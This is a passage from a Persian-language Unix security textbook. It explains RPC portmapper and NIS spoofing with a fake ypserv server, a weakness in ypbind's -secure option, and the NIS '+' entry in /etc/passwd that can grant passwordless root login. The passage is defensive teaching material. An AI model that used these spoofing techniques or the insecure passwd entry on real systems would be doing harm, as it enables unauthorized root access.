‫ﮔﻤﺮﺍﻩﺳﺎﺯﻱ ‪RPC‬‬

‫ﻓﺮﺍﺧﻮﺍﻧﻲ ﺗﺎﺑﻊ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ )‪ ١٥٩(RPC‬ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺘﺼﻞ ﺑﻪ ﺷﺒﻜﻪ ﺭﺍ ﻗﺎﺩﺭ ﻣﻲﺳﺎﺯﺩ ﻛﻪ ﺗﻮﺍﺑﻊ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺩﻳﮕﺮ ﺭﺍ ﻓﺮﺍﺧﻮﺍﻧﻲ ﻛﻨﻨﺪ‪ .‬ﺳﻴﺴﺘﻢ‬
‫‪ NIS‬ﺑﻪ ﻋﻤﻠﻜﺮﺩ ﺳﺮﻭﻳﺴﻬﺎﻱ ‪ - RPC portmapper‬ﻳﻚ ‪ daemon‬ﻛﻪ ﻧﺎﻣﻬﺎﻱ ﺧـﺪﻣﺎﺕ ﺍﺭﺍﺋـﻪﺷـﺪﻩ ﺑـﺮﺍﻱ ‪ RPC‬ﺭﺍ ﺑـﺎ ﺷـﻤﺎﺭﺓ‬
‫ﭘﻮﺭﺗﻬﺎﻱ ‪ IP‬ﻛﻪ ﻣﻲﺗﻮﺍﻥ ﺑﺎ ﺁﻥ ﺧﺪﻣﺎﺕ ﺗﻤﺎﺱ ﺑﺮﻗﺮﺍﺭ ﻛﺮﺩ ﻣﻄﺎﺑﻘﺖ ﻣﻲﺩﻫﺪ ‪ -‬ﻭﺍﺑﺴﺘﻪ ﺍﺳﺖ‪ .‬ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻳﻲ ﻛﻪ ﺍﺯ ‪ RPC‬ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻣﻲﻛﻨﻨﺪ ﻭﻗﺘﻲ ﻛﺎﺭﺷﺎﻥ ﺁﻏﺎﺯ ﻣﻲﺷﻮﺩ ﺧﻮﺩ ﺭﺍ ﺑﺎ ‪ portmapper‬ﺛﺒﺖ ﻣﻲﻧﻤﺎﻳﻨﺪ‪ ،‬ﻭ ﺯﻣﺎﻧﻴﻜﻪ ﻛﺎﺭﺷﺎﻥ ﺑﻪ ﭘﺎﻳﺎﻥ ﻣﻲﺭﺳﺪ ﻳﺎ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻣﺠﺪﺩ‬
‫ﻣﻲﮔﺮﺩﻧﺪ‪ ،‬ﺧﻮﺩﺷﺎﻥ ﺭﺍ ﺍﺯ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩ ‪ portmapper‬ﺣﺬﻑ ﺧﻮﺍﻫﻨﺪ ﻛﺮﺩ‪.‬‬
‫ﺩﺭ ﻧﺴﺨﻪﻫﺎﻱ ﺍﻭﻟﻴﺔ ‪ portmapper‬ﻫﺮ ﺑﺮﻧﺎﻣﻪﺍﻱ ﻗﺎﺩﺭ ﺑﻮﺩ ﺧﻮﺩ ﺭﺍ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ‪ RPC‬ﺛﺒـﺖ ﻛﻨـﺪ‪ ،‬ﻭ ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ ﺑـﻪ‬
‫ﻣﻬﺎﺟﻤﻴﻦ ﻓﺮﺻﺖ ﻣﻲﺩﺍﺩ ﻛﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ‪ NIS‬ﺧﻮﺩ ﺭﺍ ﺛﺒﺖ ﻛﻨﻨﺪ ﻭ ﺑﺎ ﻓﺎﻳﻠﻬﺎﻱ ﺭﻣﺰ ﻋﺒﻮﺭ ﺧﻮﺩﺷﺎﻥ ﺑﻪ ﺩﺭﺧﻮﺍﺳـﺘﻬﺎ ﭘﺎﺳـﺦ ﺩﻫﻨـﺪ‪.‬‬
‫ﺑﻴﺸﺘﺮ ﻧﺴﺨﻪﻫﺎﻱ ﻓﻌﻠﻲ ‪ portmapper‬ﺗﻘﺎﺿﺎﻫﺎﻱ ﺛﺒﺖ ﻳﺎ ﺣﺬﻑ ﺧﺪﻣﺎﺕ ﺭﺍ ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺍﺯ ﺩﺳﺘﮕﺎﻩ ﺭﺍﻩ ﺩﻭﺭ ﺁﻣﺪﻩ ﺑﺎﺷﺪ‪ ،‬ﻳﺎ ﺑﻪ ﻳﻚ ﭘﻮﺭﺕ‬
‫ﻣﺠﺎﺯ ﺑﺎﺯﮔﺮﺩﺩ ﻛﻪ ﺍﺯ ﻳﻚ ﺍﺗﺼﺎﻝ ﺷﺮﻭﻉﺷﺪﻩ ﺍﺯ ﻳﻚ ﭘﻮﺭﺕ ﻏﻴﺮﻣﺠﺎﺯ ﻣﻲﺁﻳﺪ‪ ،‬ﺭﺩ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﺗﻨﻬﺎ ﻛﺎﺭﺑﺮ ﺍﺻﻠﻲ ﻣﻲﺗﻮﺍﻧـﺪ ﺗﻘﺎﺿـﺎﻫﺎﻳﻲ‬
‫ﺑﺮﺍﻱ ﺍﺿﺎﻓﻪ ﻭ ﺣﺬﻑ ﻛﺮﺩﻥ ﻧﮕﺎﺷﺘﻬﺎﻱ ﺧﺪﻣﺎﺕ ﺑﻪ ﭘﻮﺭﺗﻬﺎﻱ ﻣﺠﺎﺯ ﺍﻧﺠﺎﻡ ﺩﻫﺪ‪ ،‬ﻭ ﺗﻤﺎﻡ ﺗﻘﺎﺿﺎﻫﺎ ﻓﻘﻂ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺑـﺼﻮﺭﺕ ﻣﺤﻠـﻲ ﺍﻧﺠـﺎﻡ‬
‫ﺷﻮﻧﺪ‪ .‬ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﻧﺴﺨﻪﻫﺎﻱ ‪ portmapper daemon‬ﻣﺮﺑﻮﻁ ﺑﻪ ﻫﻤﺔ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺍﻳﻦ ﺑﺮﺭﺳﻴﻬﺎ ﺭﺍ ﺍﻧﺠﺎﻡ ﻧﻤﻲﺩﻫﻨﺪ‪.‬‬
‫ﻻ ﺭﻭﻱ ﭘﻮﺭﺗﻬﺎﻱ ﻏﻴﺮﻣﺠـﺎﺯ ﺛﺒـﺖ ﻣـﻲﺷـﻮﻧﺪ‪ .‬ﺍﺯ ﻟﺤـﺎﻅ ﻧﻈـﺮﻱ ﺣﺘـﻲ ﺑـﺎ‬ ‫ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ‪ NFS‬ﻭ ﺑﻌﻀﻲ ﺍﺯ ﺧﺪﻣﺎﺕ ‪ NIS‬ﻣﻌﻤﻮ ﹰ‬
‫ﺑﺮﺭﺳﻴﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﺑﺎﻻ ﻓﻬﺮﺳﺖ ﺷﺪ‪ ،‬ﻣﻬﺎﺟﻢ ﻣﻲﺗﻮﺍﻧﺪ ﻳﻜﻲ ﺍﺯ ﺍﻳﻦ ﺧﺪﻣﺎﺕ ﺭﺍ ﺑﺎ ﻳـﻚ ﺑﺮﻧﺎﻣـﺔ ﻣﺨـﺼﻮﺹ ﺟـﺎﻳﮕﺰﻳﻦ ﻛﻨـﺪ ﺗـﺎ ﺑﺘﻮﺍﻧـﺪ ﺑـﻪ‬
‫ﺗﻘﺎﺿﺎﻫﺎﻱ ﺳﻴﺴﺘﻢ ﺑﮕﻮﻧﻪﺍﻱ ﭘﺎﺳﺦ ﺩﻫﺪ ﻛﻪ ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻢ ﺧﺪﺷﻪﺩﺍﺭ ﮔﺮﺩﺩ‪.‬‬

‫ﮔﻤﺮﺍﻩﺳﺎﺯﻱ ‪NIS‬‬

‫ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﮔﺎﻥ ‪ NIS‬ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ‪ ،RPC‬ﺍﺯ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ NIS‬ﺍﻃﻼﻋﺎﺕ ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨﻨﺪ‪ .‬ﻳﻚ ‪ daemon‬ﻣﺤﻠﻲ ﺑـﻪ ﻧـﺎﻡ‬
‫‪ ypbind‬ﺍﻃﻼﻋﺎﺕ ﺗﻤﺎﺱ ﺭﺍ ﺑﺮﺍﻱ ‪ daemon‬ﻣﺮﺑﻮﻃﺔ ﺳﺮﻭﻳﺲﺩﻫﻨـﺪﻩ ‪ NIS‬ﺑـﻪ ﻧـﺎﻡ ‪ ypserv‬ﺩﺭ ﺣﺎﻓﻈـﻪ ﻧﮕـﻪ ﻣـﻲﺩﺍﺭﺩ‪ypserv .‬‬
‫ﻣﻲﺗﻮﺍﻧﺪ ﺑﺼﻮﺭﺕ ﻣﺤﻠﻲ ﻳﺎ ﺭﺍﻩ ﺩﻭﺭ ﺍﺟﺮﺍ ﺷﺪﻩ ﺑﺎﺷﺪ‪.‬‬
‫ﺗﺤﺖ ﻧﺴﺨﻪﻫﺎﻱ ﺍﻭﻟﻴﺔ ‪ Sun OS‬ﺍﺯ ﺧﺪﻣﺎﺕ ‪) NIS‬ﻭ ﺍﺣﺘﻤﺎ ﹰﻻ ﻧﺴﺨﻪﻫﺎﻱ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺩﻳﮕﺮ( ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺷﺖ ﻛﻪ ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﻛﻪ ﻣﺜﻞ‬
‫‪ ypserv‬ﻛﺎﺭ ﻣﻲﻛﻨﺪ ﻭ ﺑﻪ ﺗﻘﺎﺿﺎﻫﺎﻱ ‪ ypbind‬ﺟﻮﺍﺏ ﻣﻲﺩﻫﺪ ﺭﺍ ‪ instantiate‬ﻛﺮﺩ‪ .‬ﺩﺭ ﺁﻧـﺼﻮﺭﺕ ﻣـﻲﺗـﻮﺍﻥ ﺑـﻪ ‪ deamon‬ﻣﺤﻠـﻲ‬
‫‪ ypbind‬ﻓﺮﻣﺎﻥ ﺩﺍﺩ ﻛﻪ ﺑﺠﺎﻱ ‪ ypserv‬ﻭﺍﻗﻌﻲ ﺍﺯ ﺁﻥ ﺑﺮﻧﺎﻣﻪ ﻣﺸﺎﺑﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﻣﻬﺎﺟﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺳﻴﺴﺘﻢ ﺭﺍ ﻃﻮﺭﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ‬
‫ﻛﻨﺪ ﻛﻪ ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﻧﺴﺨﺔ ﺧﻮﺩﺵ ﺍﺯ ﻓﺎﻳﻞ ﺭﻣﺰ ﻋﺒﻮﺭ ﺑﺮﺍﻱ ﭘﺎﺳﺨﮕﻮﻳﻲ ﺑﻪ ﺗﻘﺎﺿﺎﻫﺎﻱ ﻭﺭﻭﺩ ﺑﻪ ﺳﻴﺴﺘﻢ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺑﮕﻴﺮﺩ!‬
‫ﭘﻴﺎﺩﻩﺳﺎﺯﻳﻬﺎﻱ ﻓﻌﻠﻲ ‪ NIS‬ﺍﺯ ‪ ypbind‬ﺣﺎﻭﻱ ﻳﻚ ﭘﺎﺭﺍﻣﺘﺮ ﺧﻂ ﻓﺮﻣﺎﻥ ‪ -secure‬ﻳﺎ ‪ -s‬ﺍﺳﺖ ﻛﻪ ﻫﻨﮕﺎﻡ ﺻﺪﻭﺭ ﺩﺳﺘﻮﺭ ﺷـﺮﻭﻉ ﺑـﻪ ﻛـﺎﺭ‬
‫‪ daemon‬ﻣﻲﺗﻮﺍﻧﺪ ﺑﻜﺎﺭ ﺭﻭﺩ‪ .‬ﺍﮔﺮ ﺍﺯ ﺍﻳﻦ ﭘﺎﺭﺍﻣﺘﺮ ﺍﺳﺘﻔﺎﺩﻩ ﺷﺪﻩ ﺑﺎﺷﺪ‪ ypbind daemon ،‬ﻫﻴﭻ ﺍﻃﻼﻋﺎﺗﻲ ﺭﺍ ﺍﺯ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩﻫـﺎﻱ‬
‫‪ ypserv‬ﻛﻪ ﺭﻭﻱ ﭘﻮﺭﺗﻬﺎﻱ ﻣﺠﺎﺯ ﺍﺟﺮﺍ ﻧﻤﻲﺷﻮﻧﺪ ﻧﺨﻮﺍﻫﺪ ﭘﺬﻳﺮﻓﺖ‪ .‬ﻟﺬﺍ ﺍﮔﺮ ﻛﺎﺭﺑﺮﻱ ﺑﺨﻮﺍﻫـﺪ ﻳـﻚ ‪ ypserve daemon‬ﺟﻌﻠـﻲ ﻭﺍﺭﺩ‬
‫ﻻ ﺩﻟﻴﻞ ﻗﺎﻧﻊﻛﻨﻨﺪﻩﺍﻱ ﺑﺮﺍﻱ ﻋﺪﻡ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭘﺎﺭﺍﻣﺘﺮ ‪ -secure‬ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ‪.‬‬
‫ﺣﺎﻓﻈﻪ ﻛﻨﺪ ﺗﻼﺷﺶ ﻧﺎﺩﻳﺪﻩ ﮔﺮﻓﺘﻪ ﻣﻲﺷﻮﺩ‪ .‬ﻣﻌﻤﻮ ﹰ‬
‫ﻣﺘﺄﺳﻔﺎﻧﻪ ﭘﺎﺭﺍﻣﺘﺮ ‪ -secure‬ﺩﺍﺭﺍﻱ ﻳﻚ ﻧﻘﺺ ﺍﺳﺖ‪ .‬ﺍﮔﺮ ﻣﻬﺎﺟﻢ ﺑﺘﻮﺍﻧﺪ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ‪ root‬ﺭﺍ ﺭﻭﻱ ﻫﺮ ﻣﺎﺷﻴﻦ ﺩﻳﮕﺮ ﻣﺘﺼﻞ ﺑﻪ ﺷـﺒﻜﻪ‬
‫ﻣﺤﻠﻲ ﻋﻮﺽ ﻛﻨﺪ ﻭ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ‪ ypserv‬ﺭﺍ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ‪ NIS‬ﺧﻮﺩﺵ ﺑـﻪ ﺍﺟـﺮﺍ ﺩﺭﺁﻭﺭﺩ‪ ،‬ﺑـﺮﺍﻱ ﺍﻧﺠـﺎﻡ ﺣﻤﻠـﻪ ﺗﻨﻬـﺎ ﺑﺎﻳـﺪ‬

‫‪159 Remote Procedure Call‬‬


‫‪٣٣٣‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫‪ ypbind‬ﻫﺪﻑ ﺭﺍ ﺑﻪ ﺁﻥ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺍﺷﺎﺭﻩ ﺩﻫﺪ‪ .‬ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻣﻮﺭﺩ ﺣﻤﻠﻪ ﻭﺍﻗﻊﺷﺪﻩ ﻣﻤﻜﻦ ﺍﺳﺖ ﺭﻭﻱ ﻳﻚ ﭘـﻮﺭﺕ ﻣﺠـﺎﺯ ﺩﺭﺣـﺎﻝ‬
‫ﺍﺟﺮﺍ ﺑﺎﺷﺪ‪ ،‬ﻭ ﻟﺬﺍ ﭘﺎﺳﺨﻬﺎﻱ ﺁﻥ ﺭﺩ ﻧﺨﻮﺍﻫﻨﺪ ﺷﺪ‪ .‬ﻣﻬﺎﺟﻢ ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ‪ ypserv‬ﻗﻼﺑﻲ ﺑﻨﻮﻳﺴﺪ ﻛﻪ ﺭﻭﻱ ﻳﻚ ﺳﻴـﺴﺘﻢ ﺳـﺎﺯﮔﺎﺭ‬
‫ﺑﺎ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭﺁﻳﺪ‪ .‬ﭘﻮﺭﺗﻬﺎﻱ ﻣﺠﺎﺯ ﺩﺭ ﺍﻳﻨﺤﺎﻟﺖ ﻣﻌﻨﺎﻱ ﺧﺎﺻﻲ ﻧﺪﺍﺭﻧﺪ‪ ،‬ﻟﺬﺍ ﻫﺮ ﻛﺎﺭﺑﺮ ﻣﻲﺗﻮﺍﻧﺪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺭﺍ ﺭﻭﻱ ﻫـﺮ‬
‫ﭘﻮﺭﺗﻲ ﺍﺟﺮﺍ ﻛﻨﺪ ﻭ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺑﺮﺍﻱ ﺭﻭﻧﺪ ‪ ypbind‬ﻣﻘﺼﺪ ﺗﺄﻣﻴﻦ ﻧﻤﺎﻳﺪ‪.‬‬

‫‪ NIS‬ﺑﺎ "‪ "+‬ﺳﺮﺩﺭﮔﻢ ﻣﻲﺷﻮﺩ‬


‫ﺣﺘﻲ ﻭﻗﺘﻲ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎﻱ ‪ NIS‬ﺑﺎ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺻﺤﻴﺢ ﺗﻤﺎﺱ ﺑﺮﻗﺮﺍﺭ ﻣـﻲﻛﻨﻨـﺪ‪ ،‬ﻣﻤﻜـﻦ ﺍﺳـﺖ ‪ NIS‬ﻣـﺸﻜﻼﺕ ﺍﻣﻨﻴﺘـﻲ‬
‫ﺩﻳﮕﺮﻱ ﺑﻮﺟﻮﺩ ﺑﻴﺎﻭﺭﺩ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺗﺮﻛﻴﺒﻲ ﺍﺯ ﺍﺷﺘﺒﺎﻫﺎﺕ ﺩﺭ ﺗﻮﺳﻌﺔ ﺍﻭﻟﻴﻪ ﻭ ﻣﺠﺪﺩ ‪ NIS‬ﺑﺎﻋﺚ ﺑﺮﻭﺯ ﺳـﺮﺩﺭﮔﻤﻲﻫـﺎﻳﻲ ﺩﺭ ﻣـﻮﺭﺩ ﻋﻼﻣـﺖ‬
‫ﺟﻤﻊ )‪ NIS (+‬ﺩﺭ ﻓﺎﻳﻞ ‪ /etc/passwd‬ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﺍﮔﺮ ﺷﻤﺎ ﺍﺯ ‪ NIS‬ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ ﺑﺴﻴﺎﺭ ﻣﺮﺍﻗﺐ ﺑﺎﺷﻴﺪ ﻛﻪ ﻋﻼﻣﺖ ﺟﻤﻊ )‪ (+‬ﺩﺭ ﻓﺎﻳﻞ ‪ /etc/passwd‬ﺭﻭﻱ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﺑﺎﺷﺪ‪ ،‬ﻭ ﻧـﻪ‬
‫ﺭﻭﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ‪ .‬ﺩﺭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ‪ NIS‬ﺗﺤﺖ ﺑﻌﻀﻲ ﺍﺯ ﻧﺴﺨﻪﻫﺎﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ‪ ،Unix‬ﻋﻼﻣﺖ ﺟﻤﻊ ﻣـﻲﺗﻮﺍﻧـﺪ ﺑﻌﻨـﻮﺍﻥ‬
‫ﻳﻚ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﺗﻌﺒﻴﺮ ﺷﻮﺩ‪ .‬ﺳﺎﺩﻩﺗﺮﻳﻦ ﺭﻭﺵ ﺑﺮﺍﻱ ﭘﻴﺸﮕﻴﺮﻱ ﺍﺯ ﺍﻳﻦ ﻣﺸﻜﻞ‪ ،‬ﻛﺴﺐ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﻧﺪﺍﺷﺘﻦ ﻳﻚ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﺑﺎ ﻧـﺎﻡ "‪"+‬‬
‫ﺭﻭﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ NIS‬ﺍﺳﺖ‪.‬‬
‫ﺗﻼﺵ ﺑﺮﺍﻱ ﻓﻬﻤﻴﺪﻥ ﺍﻳﻨﻜﻪ ﭼﻪ ﭼﻴﺰﻫﺎﻳﻲ ﺭﺍ ﺑﺎﻳﺪ ﺭﻭﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﮔﺬﺍﺷﺖ ﻳﻚ ﻣﺸﻜﻞ ﺩﻳﮕﺮ ﺍﺳﺖ‪ .‬ﺩﺭ ﻧﺴﺨﻪﻫﺎﻱ ﺍﻭﻟﻴﻪ ‪ ،NIS‬ﺧـﻂ‬
‫ﺯﻳﺮ ﻫﻢ ﻭﺟﻮﺩ ﺩﺍﺷﺖ‪:‬‬
‫‪+::0:0:::‬‬
‫ﻛﻪ ﺩﺭ ‪ SunOS‬ﻭ ‪ Solaris‬ﺻﺤﻴﺢ ﺑﻮﺩ‪.‬‬
‫ﻣﺘﺄﺳﻔﺎﻧﻪ ﻫﻤﻴﻦ ﻳﻚ ﺧﻂ ﺑﺎﻋﺚ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻥ ﻳﻚ ﻣﺸﻜﻞ ﻣﻲﺷﺪ‪ .‬ﻭﻗﺘﻲ ‪ NIS‬ﺩﺭﺣﺎﻝ ﺍﺟﺮﺍ ﻧﺒﻮﺩ‪ ،‬ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﻋﻼﻣﺖ ﺟﻤﻊ ﺑﻌﻨـﻮﺍﻥ ﻧـﺎﻡ‬
‫ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪ ﻣﻲﺷﺪ ﻭ ﻫﺮ ﻛﺴﻲ ﻣﻲﺗﻮﺍﻧﺴﺖ ﺑﺎ ﺗﺎﻳﭗ ﻛﺮﺩﻥ "‪ "+‬ﺳﻴﺴﺘﻢ ﺑﻪ ﺭﺍﻳﺎﻧﻪ ﻭﺍﺭﺩ ﺷﻮﺩ ﻭ ﺑﺪﻭﻥ ﺭﻣﺰ ﻋﺒﻮﺭ ﺑﻪ ﺍﻋـﻼﻥ‬
‫‪١٦٠‬‬
‫ﻓﺮﻣﺎﻥ ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻛﻨﺪ‪ .‬ﺑﺪﺗﺮ ﺍﺯ ﻫﻤﻪ ﺍﻳﻨﻜﻪ ﺁﻥ ﻓﺮﺩ ﺑﺎ ﺍﻣﺘﻴﺎﺯﺍﺕ ﭘﺮﺩﺳﺘﺮﺳﻲﺗﺮﻳﻦ ﻛﺎﺭﺑﺮ ﻭﺍﺭﺩ ﻣﻲﺷﺪ‪.‬‬
‫ﻳﻚ ﺭﻭﺵ ﺑﺮﺍﻱ ﺑﻪ ﺣﺪﺍﻗﻞ ﺭﺳﺎﻧﺪﻥ ﺧﻄﺮ ﺩﺭ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎﻱ ‪ NIS‬ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺭﻣﺰ ﻋﺒﻮﺭ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮ "‪ "+‬ﺑﻮﺩ‪ .‬ﻋﻼﻣـﺖ ﺟﻤـﻊ ﺭﺍ‬
‫ﺩﺭ ﺣﺎﻟﺖ ﺯﻳﺮ ﺩﺭﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ‪:‬‬
‫‪+:‘:0:0:::‬‬
‫ﻣﺘﺄﺳﻔﺎﻧﻪ‪ ،‬ﺗﺤﺖ ﺑﻌﻀﻲ ﻧﺴﺨﻪﻫﺎﻱ ‪ ،NIS‬ﺍﻳﻦ ﻗﻠﻢ ﺩﺍﺩﻩ ﺑﻪ ﺍﻳﻦ ﻣﻌﻨﺎ ﺍﺳﺖ ﻛﻪ "ﻓﺎﻳﻞ ﻧﮕﺎﺷﺖ ‪ passwd‬ﺭﺍ ﻭﺍﺭﺩ ﻛﻦ‪ ،‬ﺍﻣﺎ ﺗﻤـﺎﻡ ﺭﻣﺰﻫـﺎﻱ‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﻋﺒﻮﺭ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺭﺍ ﺑﻪ "‘" ﺗﻐﻴﻴﺮ ﺑﺪﻩ"‪ ،‬ﻭ ﺍﻳﻨﻜﺎﺭ ﻃﺒﻴﻌﺘﹰﺎ ﺍﺯ ﻭﺭﻭﺩ ﻫﺮ ﻛﺴﻲ ﺑﻪ ﺳﻴﺴﺘﻢ ﺟﻠﻮﮔﻴﺮﻱ ﻣﻲﻛﺮﺩ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﻭﺟﻮﺩ ﺍﻳـﻦ ﻗﻠـﻢ ﺩﺍﺩﻩ‬
‫ﻫﻢ ﺻﺤﻴﺢ ﻧﺒﻮﺩ!‬
‫ﻱ "‪ "+‬ﺑـﺮﺍﻱ ﻭﺭﻭﺩ ﺑـﻪ ﺳـﺮﻭﻳﺲﮔﻴﺮﻧـﺪﻩﻫـﺎ ﻭ‬ ‫ﻳﻜﻲ ﺍﺯ ﺳﺎﺩﻩﺗﺮﻳﻦ ﺭﺍﻫﻬـﺎ ﺑـﺮﺍﻱ ﺭﻭﻳـﺎﺭﻭﻳﻲ ﺑـﺎ ﺍﻳـﻦ ﺳـﺮﺩﺭﮔﻤﻲ‪ ،‬ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻧـﺎﻡ ﻛـﺎﺭﺑﺮ ﹺ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ‪ NIS‬ﺍﺳﺖ‪ .‬ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻴﺪ ﻛﺎﺑﻞ ﺷﺒﻜﻪ ﺭﺍ ﺩﺭ ﺁﻭﺭﻳﺪ ﻭ ﺳﭙﺲ ﺑﺮﺍﻱ ﻭﺭﻭﺩ ﺑﻪ ﺳﻴﺴﺘﻢ ﺗﻼﺵ ﻛﻨﻴﺪ‪ ،‬ﺗﺎ ﺍﺗﻔـﺎﻗﻲ ﻛـﻪ‬
‫ﻫﻨﮕﺎﻡ ﺩﺭ ﺩﺳﺘﺮﺱ ﻧﺒﻮﺩﻥ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ NIS‬ﺑﺮﺍﻱ ﺭﺍﻳﺎﻧﻪ ﻣﻲﺍﻓﺘﺪ ﺷﺒﻴﻪﺳﺎﺯﻱ ﺷﻮﺩ‪ .‬ﺩﺭ ﻫﺮ ﺩﻭ ﺣﺎﻟﺖ ﻧﺒﺎﻳﺪ ﺑﺘﻮﺍﻧﻴﺪ ﻓﻘﻂ ﺑﺎ ﺗﺎﻳﭗ ﻛـﺮﺩﻥ‬
‫"‪ "+‬ﺑﻌﻨﻮﺍﻥ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭﺍﺭﺩ ﺳﻴﺴﺘﻢ ﺷﻮﻳﺪ‪ .‬ﺍﻳﻦ ﺁﺯﻣﻮﻥ ﺑﻪ ﺷﻤﺎ ﺧﻮﺍﻫﺪ ﮔﻔﺖ ﻛﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﺪﺭﺳﺘﻲ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺷﺪﻩ ﻳﺎ ﺧﻴﺮ‪.‬‬
‫ﺍﮔﺮ ﻧﺴﺨﺔ ﺟﺪﻳﺪﻱ ﺍﺯ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺧﻮﺩ ﺭﺍ ﺍﺟﺮﺍ ﻣﻲﻛﻨﻴﺪ‪ ،‬ﮔﻤﺎﻥ ﻧﻜﻨﻴﺪ ﻛﻪ ﺳﻴﺴﺘﻤﺘﺎﻥ ﻧـﺴﺒﺖ ﺑـﻪ ﺳـﺮﺩﺭﮔﻤﻲ ﺯﻳﺮﺳﻴـﺴﺘﻤﻬﺎﻱ ‪ NIS‬ﺩﺭ‬
‫ﻗﺒﺎﻝ "‪ "+‬ﺍﻳﻤﻦ ﺍﺳﺖ‪ .‬ﺑﻄﻮﺭ ﺧﺎﺹ‪ ،‬ﺑﻌﻀﻲ ﺍﺯ ﻧﺴﺨﻪﻫﺎﻱ ‪ NIS‬ﺭﻭﻱ ‪ Linux‬ﻫﻢ ﺍﻳﻦ ﺍﺷﺘﺒﺎﻩ ﺭﺍ ﻣﺮﺗﻜﺐ ﻣﻲﺷﻮﻧﺪ‪.‬‬

